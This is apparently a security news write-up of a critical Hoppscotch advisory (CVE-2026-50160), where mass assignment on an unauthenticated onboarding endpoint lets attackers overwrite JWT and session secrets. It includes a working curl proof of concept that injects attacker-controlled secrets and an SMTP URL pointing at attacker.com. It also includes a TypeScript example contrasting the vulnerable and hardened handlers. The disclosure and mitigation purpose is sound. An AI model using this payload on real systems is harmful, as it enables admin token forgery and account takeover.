GBHackers

Critical Hoppscotch Vulnerability Lets Attackers Overwrite JWT_SECRET and Forge Admin Tokens


A critical security vulnerability, identified as CVE-2026-50160, has been discovered in the self-hosted Hoppscotch backend.

This vulnerability allows unauthenticated attackers to overwrite sensitive configuration values, including the JWT signing secret, which can ultimately lead to a complete administrative takeover of affected instances.

The issue is documented in the GitHub advisory GHSA-j542-4rch-8hwf and impacts all versions up to 2026.4.1. It has been patched in version 2026.5.0. The flaw carries a maximum CVSS score of 10.0 due to its ease of exploitation and the extent of potential compromise.

Critical Hoppscotch Vulnerability

The vulnerability stems from a mass assignment flaw in the POST /v1/onboarding/config endpoint, which is accessible without authentication during the initial setup phase when no users exist (usersCount === 0).

This endpoint is intended to configure onboarding parameters such as SMTP and OAuth settings; however, due to improper input validation, attackers can inject arbitrary configuration keys that are not explicitly defined in the expected request DTO.

At the core of the issue is the use of the NestJS ValidationPipe without its whitelist (allowlist) option enabled. As a result, additional properties supplied in the request body are not stripped and are passed directly into the application logic.

These properties are then processed using Object.entries(dto), which blindly iterates over all supplied keys without enforcing any restrictions. Critically, sensitive configuration keys such as JWT_SECRET and SESSION_SECRET are valid internal enum values, allowing attacker-supplied values to be accepted and stored.

Further compounding the issue, the validateEnvValues logic fails to reject unauthorized keys explicitly. Instead, unrecognized entries fall through a default: break condition, effectively bypassing validation.

Combined with the lack of authentication on the onboarding endpoint, these weaknesses create a perfect attack chain enabling complete system compromise.

In a successful attack scenario, an adversary can overwrite the JWT_SECRET with a value they control, allowing them to forge valid authentication tokens for any user, including administrators.

Since token verification relies on this secret, all JwtAuthGuard protections become ineffective. Attackers can then impersonate users, access sensitive data, extract API keys, and maintain persistent access even after credential resets. Additionally, overwriting SESSION_SECRET enables session hijacking and invalidation of legitimate user sessions.

The vulnerability is particularly dangerous because it targets freshly deployed instances that are often exposed to the internet before onboarding is complete. This narrow window represents a high-risk period where automated scanning or opportunistic attackers can easily exploit the flaw.

Proof-of-concept exploitation is straightforward and requires only a single crafted HTTP request. Below is a working example demonstrating how an attacker can inject malicious configuration values:

# Step 1: Check onboarding status
curl http://target:3170/v1/onboarding/status

# Step 2: Exploit mass assignment to overwrite secrets
curl -X POST http://target:3170/v1/onboarding/config \
  -H "Content-Type: application/json" \
  -d '{
    "VITE_ALLOWED_AUTH_PROVIDERS": "EMAIL",
    "MAILER_SMTP_ENABLE": "true",
    "MAILER_SMTP_URL": "smtp://attacker.com:25",
    "MAILER_ADDRESS_FROM": "[email protected]",
    "JWT_SECRET": "ATTACKER_CONTROLLED_JWT_SECRET",
    "SESSION_SECRET": "ATTACKER_CONTROLLED_SESSION"
  }'

# Step 3: Verify compromise (database check)
psql -c "SELECT name, value FROM InfraConfig WHERE name='JWT_SECRET';"

Successful exploitation results in the backend storing attacker-controlled secrets, enabling token forgery and persistent unauthorized access.

Security researchers attribute the issue to CWE-915 (Improperly Controlled Modification of Dynamically-Determined Object Attributes), a common but dangerous class of vulnerabilities in modern API frameworks.

The advisory highlights that enabling whitelist: true in ValidationPipe would have prevented the attack entirely by stripping unknown fields. Additional recommended mitigations include strict allowlisting of configuration keys, explicit validation rejection for sensitive parameters, and enforcing authentication or one-time setup tokens for onboarding endpoints.
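To make the mass-assignment pattern and the recommended mitigation concrete, the following added example (not Hoppscotch code; function names and the onboarding allowlist are assumptions) models the pre-patch handler beside a hardened one that strips unknown keys and refuses requests naming JWT_SECRET or SESSION_SECRET:

```typescript
// Added example (not Hoppscotch code): models the CWE-915 mass-assignment pattern the
// write-up describes, using its config key names. Function names and allowlist are assumed.
// Keys the onboarding step is meant to configure (assumed subset).
const ONBOARDING_ALLOWED_KEYS = new Set([
  "VITE_ALLOWED_AUTH_PROVIDERS", "MAILER_SMTP_ENABLE",
  "MAILER_SMTP_URL", "MAILER_ADDRESS_FROM",
]);
// Internal keys that must never be writable from the unauthenticated setup path.
const SENSITIVE_KEYS = new Set(["JWT_SECRET", "SESSION_SECRET"]);
type ConfigStore = Map<string, string>;

// Pre-patch shape: no allowlist, so Object.entries() walks every supplied key and a
// valid enum name such as JWT_SECRET is stored like any other setting.
export function applyConfigVulnerable(body: Record<string, string>, store: ConfigStore): void {
  for (const [name, value] of Object.entries(body)) {
    store.set(name, value); // mass assignment: the request decides which keys are written
  }
}

// Hardened shape: unknown keys are stripped (the effect of ValidationPipe
// whitelist: true) and a request naming a sensitive key is refused as a whole
// before anything is written, so no partial apply can occur.
export function applyConfigHardened(
  body: Record<string, string>, store: ConfigStore,
): { ok: boolean; applied: string[]; stripped: string[]; rejected: string[] } {
  const applied: string[] = [], stripped: string[] = [], rejected: string[] = [];
  for (const name of Object.keys(body)) {
    if (SENSITIVE_KEYS.has(name)) rejected.push(name);
    else if (!ONBOARDING_ALLOWED_KEYS.has(name)) stripped.push(name);
    else applied.push(name);
  }
  if (rejected.length > 0) return { ok: false, applied: [], stripped, rejected };
  for (const name of applied) store.set(name, body[name]);
  return { ok: true, applied, stripped, rejected };
}

// Constructed request body mirroring the proof-of-concept payload in the article.
export const POC_BODY: Record<string, string> = {
  VITE_ALLOWED_AUTH_PROVIDERS: "EMAIL",
  MAILER_SMTP_ENABLE: "true",
  JWT_SECRET: "ATTACKER_CONTROLLED_JWT_SECRET",
  SESSION_SECRET: "ATTACKER_CONTROLLED_SESSION",
};

// Runs the payload through both handlers against stores seeded with an existing secret.
export function demo() {
  const vulnerable: ConfigStore = new Map([["JWT_SECRET", "original-secret"]]);
  const hardened: ConfigStore = new Map([["JWT_SECRET", "original-secret"]]);
  applyConfigVulnerable(POC_BODY, vulnerable);
  return { vulnerable, hardened, verdict: applyConfigHardened(POC_BODY, hardened) };
}
```

In the vulnerable path the seeded secret is silently replaced; in the hardened path the request is refused before any write and the rejected key names are returned so the caller can log the attempt.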

Organizations running self-hosted Hoppscotch instances are strongly advised to upgrade immediately to version 2026.5.0 or later. Until patched, instances exposed during initial setup remain critically vulnerable to remote compromise with no user interaction required.
